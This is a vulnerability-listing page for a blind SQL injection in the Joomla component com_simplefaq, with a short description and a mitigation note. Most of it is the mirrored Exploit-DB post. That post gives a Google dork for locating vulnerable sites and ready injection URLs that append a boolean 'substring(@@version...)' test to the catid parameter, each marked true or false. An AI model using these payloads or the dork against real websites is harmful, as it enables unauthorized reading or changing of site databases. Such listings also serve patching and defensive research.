Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability

vendor:

com_simplefaq

by:

AtT4CKxT3rR0r1ST

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: com_simplefaq

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability

Joomla Component com_simplefaq is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries in the 'catid' parameter of the 'index.php' page. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be used to access or modify data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use the least privileged user account with access to the database.

Source

Exploit-DB raw data:

Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability
=========================================================================

###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Team : Sec Attack Team
.:. Email : F.Hack@w.cn
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_simplefaq
.:. Script Download: http://www.parkviewconsultants.com/component/option,com_mosipn/page,free/
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_simplefaq"
#############################################

===[ Exploit ]===

www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70[Blind Injection]&page=1#FAQ5

www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True

www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False


===[ Example ]===

http://server/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True

http://server/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False

#############################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack